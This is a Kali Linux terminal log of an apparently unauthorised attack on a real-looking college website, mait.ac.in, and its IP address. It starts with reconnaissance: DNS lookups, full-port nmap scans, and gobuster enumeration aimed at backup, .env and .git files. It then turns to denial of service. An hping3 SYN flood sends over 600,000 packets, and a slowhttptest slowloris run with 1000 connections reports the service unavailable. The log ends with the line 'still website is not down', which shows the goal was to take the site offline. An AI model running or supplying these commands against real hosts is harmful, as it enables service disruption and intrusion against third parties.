┌──(kali㉿kali)-[~]
└─$ whois mait.ac.in
getaddrinfo(whois.registry.in): Name or service not known
┌──(kali㉿kali)-[~]
└─$ dig mait.ac.in
; <<>> DiG 9.20.9-1-Debian <<>> mait.ac.in
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24446
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: d526450ea24f63a0010000006a1f3a564020e7c09a758800 (good)
;; QUESTION SECTION:
;mait.ac.in. IN A
;; ANSWER SECTION:
mait.ac.in. 11786 IN A 111.125.140.235
;; Query time: 12 msec
;; SERVER: 192.168.0.1#53(192.168.0.1) (UDP)
;; WHEN: Wed Jun 03 01:47:26 UTC 2026
;; MSG SIZE rcvd: 83
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- mait.ac.in
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-03 01:48 UTC
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.62 seconds
┌──(kali㉿kali)-[~]
└─$
┌──(kali㉿kali)-[~]
└─$ whatweb mait.ac.in
ERROR Opening: http://mait.ac.in - execution expired
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u https://mait.ac.in -w /usr/share/wordlists/dirb/common.txt -x
Error: flag needs an argument: 'x' in -x
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- -Pn 111.125.140.235
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-03 01:53 UTC
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- -Pn 111.125.140.235
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-03 02:05 UTC
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u https://mait.ac.in -w /usr/share/wordlists/dirb/common.txt -x html,php,asp,bak,zip,tar.gz,rar,old,git,env,config,yml,json,txt,log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: https://mait.ac.in
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,old,env,yml,json,asp,tar.gz,rar,config,txt,log,git,html,php,zip
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to https://mait.ac.in/: Get "https://mait.ac.in/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
┌──(kali㉿kali)-[]
└─$ sudo apt install hping3
hping3 is already the newest version (3.a2.ds2-11kali1).
hping3 set to manually installed.
Summary:
Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 2205
┌──(kali㉿kali)-[~]
└─$ sudo hping3 -S --flood -V 111.125.140.235 -p 80
using wlan0, addr: 192.168.0.103, MTU: 1500
HPING 111.125.140.235 (wlan0 111.125.140.235): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
[send_ip] sendto: Network is unreachable
┌──(kali㉿kali)-[~]
└─$ sudo hping3 -S --flood -V 111.125.140.235 -p 80
using wlan0, addr: 192.168.0.103, MTU: 1500
HPING 111.125.140.235 (wlan0 111.125.140.235): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 111.125.140.235 hping statistic ---
619043 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
┌──(kali㉿kali)-[]
└─$ ^[[200# Install slowhttptest: sudo apt install slowhttptest
zsh: bad pattern: ^[[200~#
┌──(kali㉿kali)-[~]
└─$ slowhttptest -c 1000 -H -g -o slowloris_stats -i 10 -r 200 -u https://mait.ac.in/ -t GET -x 20
Command 'slowhttptest' not found, but can be installed with:
sudo apt install slowhttptest
Do you want to install it? (N/y)y
┌──(kali㉿kali)-[~]
└─$ # Install slowhttptest: sudo apt install slowhttptest
slowhttptest -c 1000 -H -g -o slowloris_stats -i 10 -r 200 -u https://mait.ac.in/ -t GET -x 20
Command 'slowhttptest' not found, but can be installed with:
sudo apt install slowhttptest
Do you want to install it? (N/y)y
sudo apt install slowhttptest
Installing:
slowhttptest
Summary:
Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 2205
Download size: 31.6 kB
Space needed: 91.1 kB / 2,445 MB available
Get:1 http://http.kali.org/kali kali-rolling/main amd64 slowhttptest amd64 1.9.0-1+b1 [31.6 kB]
Fetched 31.6 kB in 1s (29.0 kB/s)
Selecting previously unselected package slowhttptest.
(Reading database ... 403435 files and directories currently installed.)
Preparing to unpack .../slowhttptest_1.9.0-1+b1_amd64.deb ...
Unpacking slowhttptest (1.9.0-1+b1) ...
Setting up slowhttptest (1.9.0-1+b1) ...
Processing triggers for kali-menu (2025.2.7) ...
Processing triggers for man-db (2.13.1-1) ...
┌──(kali㉿kali)-[~]
└─$ # Install slowhttptest: sudo apt install slowhttptest
slowhttptest -c 1000 -H -g -o slowloris_stats -i 10 -r 200 -u https://mait.ac.in/ -t GET -x 20
Wed Jun 3 02:14:30 2026:
slowhttptest version 1.9.0
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 1000
URL: https://mait.ac.in/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 44
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 5 seconds
test duration: 240 seconds
using proxy: no proxy
Wed Jun 3 02:14:30 2026:
slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Wed Jun 3 02:14:35 2026:
Wed Jun 3 02:14:35 2026:
slowhttptest version 1.9.0
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 1000
URL: https://mait.ac.in/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 44
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 5 seconds
test duration: 240 seconds
using proxy: no proxy
Wed Jun 3 02:14:35 2026:
slow HTTP test status on 5th second:
initializing: 0
pending: 539
connected: 0
error: 0
closed: 219
service available: NO
Wed Jun 3 02:14:40 2026:
Wed Jun 3 02:14:40 2026:
slowhttptest version 1.9.0
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 1000
URL: https://mait.ac.in/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 44
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 5 seconds
test duration: 240 seconds
using proxy: no proxy
Wed Jun 3 02:14:40 2026:
slow HTTP test status on 10th second:
initializing: 0
pending: 470
connected: 0
error: 0
closed: 530
service available: NO
Wed Jun 3 02:14:41 2026:
Test ended on 11th second
Exit status: Connection refused
CSV report saved to slowloris_stats.csv
HTML report saved to slowloris_stats.html
┌──(kali㉿kali)-[~]
└─$
still website is not down